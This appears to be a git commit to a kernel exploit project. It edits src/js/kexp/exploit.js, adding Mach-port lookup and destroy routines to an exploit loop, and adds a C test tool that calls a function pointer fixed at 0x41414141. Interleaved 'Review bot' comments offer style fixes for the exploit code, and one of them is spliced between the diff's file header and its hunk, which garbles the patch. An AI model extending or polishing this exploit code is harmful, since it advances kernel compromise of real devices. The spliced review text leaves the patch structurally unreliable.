From 5039c6d16ee4e2cfaa9374a941afee789556eeca Mon Sep 17 00:00:00 2001
From: spv420
Date: Wed, 27 Jul 2022 16:13:31 -0400
Subject: fuck it

---
 src/js/kexp/exploit.js | 28 +++++++++++++++++++++++++++-
 tools/testlol.c | 12 ++++++++++++
 2 files changed, 39 insertions(+), 1 deletion(-)

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 7ec7cc3..55ac673 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -368,6 +368,32 @@ function mach_ports_lookup_shit() {
 // return 0x42603;
 }
 
+function mach_ports_lookup_shit_dealloc() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
+
+ for (var i = 0; i < read_u32(sz); i++) {
+ if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
+ mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
+ }
+ }
+
+ return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
+}
+
 var kernel_task_addr = 0;
 function get_kernel_task() {
 var ret = 0;
@@ -458,7 +484,7 @@ again: while (true) {
 var arrmpt = shit_heap(8);
 write_u32(arrmpt, 0);
 write_u32(arrmpt + 4, 0);
- mach_ports_lookup_shit();
+ mach_ports_lookup_shit_dealloc();
 var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 mach_ports_lookup_shit();
 printf("%d %s\n", ret__, mach_error_string(ret__));
diff --git a/tools/testlol.c b/tools/testlol.c
index d39bf47..fa0c1d9 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
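Review bot: The value returned on the last line of `mach_ports_lookup_shit_dealloc`, `read_u32(read_u32(arrz) + 8)`, is a port name that the loop just above has already passed to `mach_port_destroy`, so the caller receives a name that no longer denotes a right; the only call site in this commit (the `again:` loop in the second hunk) discards the result, so the `return` can simply be dropped, or the function should say in a comment that its result is informational only. `var sz = shit_heap(4);;` carries a stray second semicolon, and `read_u32(read_u32(arrz) + (i << 2))` is evaluated twice per iteration where `var name = read_u32(read_u32(arrz) + (i << 2));` once at the top of the loop body reads more clearly. The six identical `printf("fuck\n")` lines are debug tracing that cannot be told apart in the output; either number them or remove them before this lands.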
@@ -107,6 +107,14 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma
 return ret;
 }
 
+void (*ptr)() = (void (*)())0x41414141;
+
+static kern_return_t r3gister(task_t task, mach_port_array_t init_port_set, mach_msg_type_number_t real_count, mach_msg_type_number_t fake_count)
+{
+ ptr();
+ printf("%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p\n");
+}
+
 struct test {
 int a;
 int b;
@@ -242,6 +250,10 @@ int main(int argc, char* argv[]) {
 mach_port_t *arrz=0;
 printf("%p %p\n", arrz, &arrz);
 
+ mach_port_t arr[2] = {MACH_PORT_NULL,MACH_PORT_NULL};
+ r3gister(0x41414141,arr,0x42424242,3);
+ printf("r3gister done\n");
+
 #pragma pack(4)
 typedef struct {

-- 
cgit v1.2.3
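Review bot: `r3gister` is declared to return `kern_return_t` but falls off the end of its body without a `return`, and its `printf` names dozens of `%p` conversions while passing no arguments at all, which is undefined behaviour (C11 7.21.6.1p2) and is flagged by `-Wformat`; every `%p` needs a matching `void *` argument, or the format should be cut down to what is actually passed. Because `ptr` is initialised to the constant `0x41414141`, the call `ptr()` on the first line of the body presumably faults before the `printf` is ever reached — if that is the intended test (the commit title gives no hint), a comment such as `/* deliberately faults: ptr points at a fixed, unmapped address */` would save the next reader the guess. All four parameters are unused and `ptr` is a non-static global with an old-style `()` declarator; `static void (*ptr)(void)` and `(void)task; (void)init_port_set; (void)real_count; (void)fake_count;` quiet the warnings. The second hunk's call `r3gister(0x41414141,arr,0x42424242,3)` in `main` ignores the (missing) return value and is covered by the same points.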